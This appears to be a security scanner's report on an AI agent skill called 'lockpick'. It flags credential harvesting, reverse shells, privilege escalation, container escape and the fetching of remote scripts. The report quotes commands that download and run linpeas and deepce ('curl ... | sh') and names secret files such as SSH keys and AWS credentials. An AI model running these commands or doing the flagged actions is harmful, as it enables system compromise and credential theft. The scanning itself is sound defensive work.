lockpick

HIGH W007: Insecure credential handling detected in skill instructions.

• Insecure credential handling detected (high risk: 1.00). The skill explicitly directs reading secrets (AWS creds, WireGuard/OpenVPN keys, k8s serviceaccount token, /etc/ipsec.secrets, SSH keys, etc.), shows commands that inject those values into requests (e.g., Authorization: Bearer $TOKEN) and captures command output/evidence, which requires handling and potentially outputting secret values verbatim.

CRITICAL E006: Malicious code pattern detected in skill scripts.

• Malicious code pattern detected (high risk: 1.00). This content is an explicit offensive post‑exploitation/privesc playbook containing step‑by‑step instructions for credential theft, data exfiltration, remote code execution (reverse shells and exec payloads), privilege escalation, persistence (cron/startup modifications, adding SSH keys), container/host escape via docker.sock and privileged capabilities, and Kubernetes/Cloud secret harvesting—all behaviors that enable deliberate system compromise and backdoor installation and are highly likely to be abused.

MEDIUM W011: Third-party content exposure detected (indirect prompt injection risk).

• Third-party content exposure detected (high risk: 0.90). The skill's workflow and reference files explicitly instruct fetching and executing user-hosted tooling from public sites (e.g., references/linux-privesc.md shows curl commands to download linpeas.sh, pspy, and linux-exploit-suggester from GitHub and references/container-breakout.md curls deepce.sh from GitHub), so the agent is expected to ingest untrusted third‑party content whose output can materially influence subsequent actions.

MEDIUM W012: Unverifiable external dependency detected (runtime URL that controls agent).

• Potentially malicious external URL detected (high risk: 0.90). The skill explicitly instructs downloading and executing remote scripts at runtime (e.g., curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh -o /tmp/lp.sh && /tmp/lp.sh and similar curl https://github.com/stealthcopter/deepce/raw/main/deepce.sh | sh), so external URLs are used to fetch and run code that directly controls the agent's actions.

MEDIUM W013: Attempt to modify system services in skill instructions.

• Attempt to modify system services in skill instructions detected (high risk: 1.00). This skill explicitly guides offensive actions that obtain/bypass sudo, modify system and service files (e.g., /etc/passwd, systemd units), create privileged pods and run kernel exploits—directly instructing state-changing, high-risk operations on the host.